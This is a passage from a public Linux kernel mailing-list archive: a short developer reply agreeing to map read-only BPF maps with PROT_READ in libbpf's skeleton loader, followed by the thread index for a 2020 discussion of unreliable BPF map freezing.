> bpf_object__load_skeleton() only maps BPF_F_RDONLY_PROG maps with
> PROT_READ.

I think that's reasonable and given the intent of frozen read-only
map, shouldn't break any reasonable use case. I'll send a patch soon.

^ permalink raw reply	[flat|nested] 11+ messages in thread

end of thread, other threads:[~2020-04-16  5:42 UTC | newest]

Thread overview: 11+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2020-04-08 16:56 BPF map freezing is unreliable; can we instead just inline constants? Jann Horn
2020-04-09 23:33 ` Andrii Nakryiko
2020-04-10  8:46   ` Jann Horn
2020-04-10 20:48     ` Andrii Nakryiko
2020-04-14 16:07       ` Jann Horn
2020-04-14 19:46         ` Andrii Nakryiko
2020-04-14 22:50           ` Jann Horn
2020-04-15  4:59             ` Andrii Nakryiko
2020-04-15 19:07               ` Jann Horn
2020-04-15 20:03                 ` Jann Horn
2020-04-16  5:42                   ` Andrii Nakryiko

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.